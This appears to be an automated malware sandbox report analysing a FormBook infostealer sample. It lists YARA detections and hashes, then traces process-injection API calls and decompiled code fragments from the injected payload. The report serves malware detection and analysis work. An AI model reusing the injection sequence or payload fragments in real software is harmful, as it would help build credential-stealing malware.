                                                                Reputation:moderate

                                                                Target ID:3
                                                                Start time:14:51:36
                                                                Start date:30/01/2023
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Explorer.EXE
                                                                Imagebase:0x7ff647860000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Target ID:4
                                                                Start time:14:51:46
                                                                Start date:30/01/2023
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                Imagebase:0xd90000
                                                                File size:59904 bytes
                                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                Reputation:high


                                                                  Execution Graph

                                                                  Execution Coverage:14.4%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:83
                                                                  Total number of Limit Nodes:5
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01AA79A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: f2f475781f55762cc0bf3113e040ddc652b3f990b12592653ce9e7f4f65b1a5a
                                                                  • Instruction ID: 02176b216b52f4ff634232369465770f7f866a2d51ed078cfcbfa2557a4276f7
                                                                  • Opcode Fuzzy Hash: f2f475781f55762cc0bf3113e040ddc652b3f990b12592653ce9e7f4f65b1a5a
                                                                  • Instruction Fuzzy Hash: CDC13871D002298FDB21CFA8C841BEEBBB1BF49300F4495A9E849B7240DB759A85CF95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01AA79A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: f94afd95bdbe01fbc746dc22988c2476cbc33e746f8c536788a3db9c87290873
                                                                  • Instruction ID: 83d189ba2b773f449ebf756d1fc4d2801666d50e4c69c7ed32c0c9461b67c31a
                                                                  • Opcode Fuzzy Hash: f94afd95bdbe01fbc746dc22988c2476cbc33e746f8c536788a3db9c87290873
                                                                  • Instruction Fuzzy Hash: FCC12771D002298FDB21CFA9C841BEEBBB1FF49300F4495A9E849B7240DB759A85CF95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01AA7023
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: cd3cc991dd9eeb9a72d5d3f9faa320ddebfdd221d823978601c887d69b78165c
                                                                  • Instruction ID: 6d9e091532ebe2c0d0ef5316c7244694431c673920838f4bc0cbed337ff6cd49
                                                                  • Opcode Fuzzy Hash: cd3cc991dd9eeb9a72d5d3f9faa320ddebfdd221d823978601c887d69b78165c
                                                                  • Instruction Fuzzy Hash: 73419BB5D012589FCF00CFA9D984AEEFBF1BB49314F54902AE818B7210D739AA45CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01AA7023
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: eaaadee21ac865352d30b3a8860a7a3190a81a2fafa30b05d35f394796e30cc7
                                                                  • Instruction ID: 0b7b1ba47330378c5b0ed8d66c9f1397084df4365cda766ca636939b2275aa43
                                                                  • Opcode Fuzzy Hash: eaaadee21ac865352d30b3a8860a7a3190a81a2fafa30b05d35f394796e30cc7
                                                                  • Instruction Fuzzy Hash: 0B419AB5D012589FCF00CFAAD984ADEFBF1BB49314F54902AE818B7210D739AA45CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01AA715A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: f336e6e58cadbfad07848717100f16c65c3ea968d96af86fb6cd5fd3496eb227
                                                                  • Instruction ID: 35b9cfa821ec58ee5d1bf7dcd008c8f3228253ccf5c350b8a0791c96a997a516
                                                                  • Opcode Fuzzy Hash: f336e6e58cadbfad07848717100f16c65c3ea968d96af86fb6cd5fd3496eb227
                                                                  • Instruction Fuzzy Hash: 3B4188B5D00258DFCF10CFAAD980AEEFBB1BB49310F54942AE815B7210D739A945CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01AA715A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: 5adb22914c5a31b41da9f6ddc8503476eeb67660fa4f91bb2130578fe4c9ee5f
                                                                  • Instruction ID: e72539b6c5ccc4ac36dca8cef5e34d24b46a0d1b0c54eeb985b96e9813122f0a
                                                                  • Opcode Fuzzy Hash: 5adb22914c5a31b41da9f6ddc8503476eeb67660fa4f91bb2130578fe4c9ee5f
                                                                  • Instruction Fuzzy Hash: 644188B5D002589FCF10CFEAD880AEEFBB5BB49310F54942AE815B7210D739A945CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01AA6EDA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 7a289184f3aa05ddc28adc96584750d2471a5bb7a9ea4f0d053ecd82c3f5faab
                                                                  • Instruction ID: 82f1962100bb5d47153915a1fc5c7613bc713a968d36b48c3b5ff217fa78e67f
                                                                  • Opcode Fuzzy Hash: 7a289184f3aa05ddc28adc96584750d2471a5bb7a9ea4f0d053ecd82c3f5faab
                                                                  • Instruction Fuzzy Hash: 903177B5D002589FCF10CFAAD980ADEBBB5AB49310F14A42AE819B7310D735A946CF65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01AA6EDA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: eb3556e21432f0d29592bfc56e9026ea6ef5eaba9d1db4bd1bfc443877c27a5d
                                                                  • Instruction ID: a6d6cde80ccef7bea95ffb4bbc62cb63b752311f351953e92f4d1798605180cc
                                                                  • Opcode Fuzzy Hash: eb3556e21432f0d29592bfc56e9026ea6ef5eaba9d1db4bd1bfc443877c27a5d
                                                                  • Instruction Fuzzy Hash: 873166B5D002589FCF10CFAAD980ADEBBB5AB49310F14A42AE819B7310D735A946CF65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetThreadContext.KERNELBASE(?,?), ref: 01AA6DB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThread
                                                                  • String ID:
                                                                  • API String ID: 1591575202-0
                                                                  • Opcode ID: 381daafd724f7abe0b3e0b53978d6e4abb9830de4ad919dd9bd7ca30f57ed4b9
                                                                  • Instruction ID: daac9b71b2c8f173a1358e6b943e87e193825585c49abf6f2fcbf0f39c6bdc98
                                                                  • Opcode Fuzzy Hash: 381daafd724f7abe0b3e0b53978d6e4abb9830de4ad919dd9bd7ca30f57ed4b9
                                                                  • Instruction Fuzzy Hash: B641ACB5D01258DFDB10DFAAD884AEEBFF1AB49314F54902AE418B7200D7389985CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetThreadContext.KERNELBASE(?,?), ref: 01AA6DB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThread
                                                                  • String ID:
                                                                  • API String ID: 1591575202-0
                                                                  • Opcode ID: b5cdef4576905c50476cfd889b78e3ded4a16a58fb3974b19e0251ff34f14d9b
                                                                  • Instruction ID: 40a05d202c48f7fa7004aec50729bfcf05403b374a7f18ebfdfbc904945d7fba
                                                                  • Opcode Fuzzy Hash: b5cdef4576905c50476cfd889b78e3ded4a16a58fb3974b19e0251ff34f14d9b
                                                                  • Instruction Fuzzy Hash: 0A319DB5D01258DFDB10DFAAD484AEEBFF1AB49314F54802AE418B7240D778A985CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ResumeThread.KERNELBASE(?), ref: 01AA6C66
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: a18419cd2dca0d4a8f15ff90d10598faa7a9251f2b93f2cc321cfc697f228b2f
                                                                  • Instruction ID: 5577631b1e404abcd2cb18123f654318056fa4431305fe9f8465efc1c4813e0f
                                                                  • Opcode Fuzzy Hash: a18419cd2dca0d4a8f15ff90d10598faa7a9251f2b93f2cc321cfc697f228b2f
                                                                  • Instruction Fuzzy Hash: F731CCB4D012189FCF10CFAAD880AEEFBB5EB49314F54942AE818B7300D734A941CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ResumeThread.KERNELBASE(?), ref: 01AA6C66
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 1dc83e93df2bce5c3deea905b16a2c0fcd50f0f4b683e5422ee16ba4697d9e2c
                                                                  • Instruction ID: 38e790747f8134540af60a47323f2efd8d038d20cf761b8f1ceb99b3ffb21b34
                                                                  • Opcode Fuzzy Hash: 1dc83e93df2bce5c3deea905b16a2c0fcd50f0f4b683e5422ee16ba4697d9e2c
                                                                  • Instruction Fuzzy Hash: FE31ACB4D012189FCF14CFAAD584AEEFBB5EB49314F54942AE819B7300C734A941CFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: P$UUUU$rA29
                                                                  • API String ID: 0-1803072496
                                                                  • Opcode ID: 825a458211af9591123622949a4865beebad8605d6615250a7df0e7c3ed752ca
                                                                  • Instruction ID: 7619ed192be417e325bdfe79e697b68ca62bc3f821c6bdce6f9af99186d26ce9
                                                                  • Opcode Fuzzy Hash: 825a458211af9591123622949a4865beebad8605d6615250a7df0e7c3ed752ca
                                                                  • Instruction Fuzzy Hash: 1EA1B4B1E016288FDB64CFA9DA807CDFBF6AB88300F5491A6D548EB245D7349E85CF04
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4
                                                                  • API String ID: 0-4088798008
                                                                  • Opcode ID: a4a8176995975773fe06ec9e5ed7867296bbac83ae2110bd08883ad58d106464
                                                                  • Instruction ID: e29097a9c273f7c088125b7860ccf6409bbfe62da53140e3a5926995f0f7f8fe
                                                                  • Opcode Fuzzy Hash: a4a8176995975773fe06ec9e5ed7867296bbac83ae2110bd08883ad58d106464
                                                                  • Instruction Fuzzy Hash: 58516071E016588BEB69CF6B8D4078AFAF7BFC8200F58D1FA950CA7255DB704A858F11
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4
                                                                  • API String ID: 0-4088798008
                                                                  • Opcode ID: a834f3d70ed6cca95925b5aa8a2ec2e48bc3a6911e34ebb1968849ef65437d54
                                                                  • Instruction ID: 61546c915417b738284790473d0331139ccc104a8a126e5276e457cd17a1a303
                                                                  • Opcode Fuzzy Hash: a834f3d70ed6cca95925b5aa8a2ec2e48bc3a6911e34ebb1968849ef65437d54
                                                                  • Instruction Fuzzy Hash: D2418071E016148BEB6DCF6B8D4079AFAF7BFC8200F54C1FA950CAA255DB704A858F11
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4bfc02ba686d4efddca084eee75c62d3f1f26d11dc8ee158310f2a6777391ed6
                                                                  • Instruction ID: dd75954bce9698115c36d22fe4611c88c0a1d839e7ae4f6da6284dea3553cf76
                                                                  • Opcode Fuzzy Hash: 4bfc02ba686d4efddca084eee75c62d3f1f26d11dc8ee158310f2a6777391ed6
                                                                  • Instruction Fuzzy Hash: 62326B39C05346EFD388DF78C846551FBB0FF8922435891AEDE800918ADB35ED5AAF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0521688ece6414ff066de3081e74b1eb5510e56a32b31cdc6c67dcf73e678f52
                                                                  • Instruction ID: 0b03b9a19474aab36b7884001c4dab0ae220c11a7121914f6f5e96b329bbbbe4
                                                                  • Opcode Fuzzy Hash: 0521688ece6414ff066de3081e74b1eb5510e56a32b31cdc6c67dcf73e678f52
                                                                  • Instruction Fuzzy Hash: EE511970A00249CFE759EFB9E85469ABBB2FB88304F14C929D408AB365EF785815CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.248189881.0000000001AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1aa0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f4c6a58bc6c0824f51588cad8a4ae199a5581ad11b891e0fc0f8fe364f5cbb6f
                                                                  • Instruction ID: 9b0e2dcd64c352e488fbc3b9e65ea1e43cda8620ff96632293b090b1a287d379
                                                                  • Opcode Fuzzy Hash: f4c6a58bc6c0824f51588cad8a4ae199a5581ad11b891e0fc0f8fe364f5cbb6f
                                                                  • Instruction Fuzzy Hash: F0510A70A00249CFE759EFB9E85469EBBF3BB88304F14C829D408AB365EF785855CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:5.6%
                                                                  Dynamic/Decrypted Code Coverage:3.4%
                                                                  Signature Coverage:4.7%
                                                                  Total number of Nodes:643
                                                                  Total number of Limit Nodes:79

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 148 40cf93-40cfaf 149 40cfb7-40cfbc 148->149 150 40cfb2 call 420ed3 148->150 151 40cfc2-40cfd0 call 4213f3 149->151 152 40cfbe-40cfc1 149->152 150->149 155 40cfe0-40cff1 call 41f773 151->155 156 40cfd2-40cfdd call 421673 151->156 161 40cff3-40d007 LdrLoadDll 155->161 162 40d00a-40d00d 155->162 156->155 161->162
                                                                  C-Code - Quality: 100%
                                                                  			E0040CF93(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                  				char* _v8;
                                                                  				struct _EXCEPTION_RECORD _v12;
                                                                  				struct _OBJDIR_INFORMATION _v16;
                                                                  				char _v536;
                                                                  				void* _t15;
                                                                  				struct _OBJDIR_INFORMATION _t17;
                                                                  				struct _OBJDIR_INFORMATION _t18;
                                                                  				void* _t30;
                                                                  				void* _t31;
                                                                  				void* _t32;
                                                                  
                                                                  				_v8 =  &_v536;
                                                                  				_t15 = E00420ED3( &_v12, 0x104, _a8);
                                                                  				_t31 = _t30 + 0xc;
                                                                  				if(_t15 != 0) {
                                                                  					_t17 = E004213F3(__eflags, _v8);
                                                                  					_t32 = _t31 + 4;
                                                                  					__eflags = _t17;
                                                                  					if(_t17 != 0) {
                                                                  						E00421673( &_v12, 0);
                                                                  						_t32 = _t32 + 8;
                                                                  					}
                                                                  					_t18 = E0041F773(_v8);
                                                                  					_v16 = _t18;
                                                                  					__eflags = _t18;
                                                                  					if(_t18 == 0) {
                                                                  						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                  						return _v16;
                                                                  					}
                                                                  					return _t18;
                                                                  				} else {
                                                                  					return _t15;
                                                                  				}
                                                                  			}














                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040D005
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 6f5b2f4712b73f0a6c183ab0c42c145bb9ecabd40e6db10e24392b7e9501096f
                                                                  • Instruction ID: bbe13f3015e6297afeaca4817b923598490fab2ca7d40facc20e4f3c260de4dd
                                                                  • Opcode Fuzzy Hash: 6f5b2f4712b73f0a6c183ab0c42c145bb9ecabd40e6db10e24392b7e9501096f
                                                                  • Instruction Fuzzy Hash: D50152B1E0020DB7DB10DBE1DC82F9EB3789B14308F0041A6E908A7280F675EB498755
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 163 41e58e-41e5e4 call 41f203 NtCreateFile
                                                                  C-Code - Quality: 79%
                                                                  			E0041E58E(void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                  				long _t21;
                                                                  
                                                                  				asm("o16 sub [eax-0x1374aae0], dh");
                                                                  				_t15 = _a4;
                                                                  				_t3 = _t15 + 0xa6c; // 0xa6c
                                                                  				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                                  				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                  				return _t21;
                                                                  			}





                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
                                                                  • Instruction ID: 3e8d1509aa00af463a8d37bfd54f617173c4f7fb56af6955cf88f9c58c8e7bef
                                                                  • Opcode Fuzzy Hash: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
                                                                  • Instruction Fuzzy Hash: DC01CFB2205148AFCB48CF99DC88EEB37A9AF8C354F058248FA4D97241C630EC51CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 166 41e593-41e5a9 167 41e5af-41e5e4 NtCreateFile 166->167 168 41e5aa call 41f203 166->168 168->167
                                                                  C-Code - Quality: 100%
                                                                  			E0041E593(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                  				long _t21;
                                                                  
                                                                  				_t3 = _a4 + 0xa6c; // 0xa6c
                                                                  				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                                  				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                  				return _t21;
                                                                  			}





                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                  • Instruction ID: 2b5a8fab2cb6a3536000231a5b839166af3a1201867cde8835e6817bdec1c646
                                                                  • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                  • Instruction Fuzzy Hash: AAF0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 169 41e63d-41e659 170 41e65f-41e68c NtReadFile 169->170 171 41e65a call 41f203 169->171 171->170
                                                                  APIs
                                                                  • NtReadFile.NTDLL(004194D3,0041499B,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,0041499B,004194D3,00000002,00000000), ref: 0041E688
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                  • Instruction ID: 0c08c0e38f336dbbf35a67dda85729340189d9c1c2ca355851ac7bf132b3d8ce
                                                                  • Opcode Fuzzy Hash: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                  • Instruction Fuzzy Hash: 06F0CFB2200108ABCB14DF99DC85EEB7BA9EF8C354F158249FA0DA7241C630E911CBA0
                                                                  Uniqueness

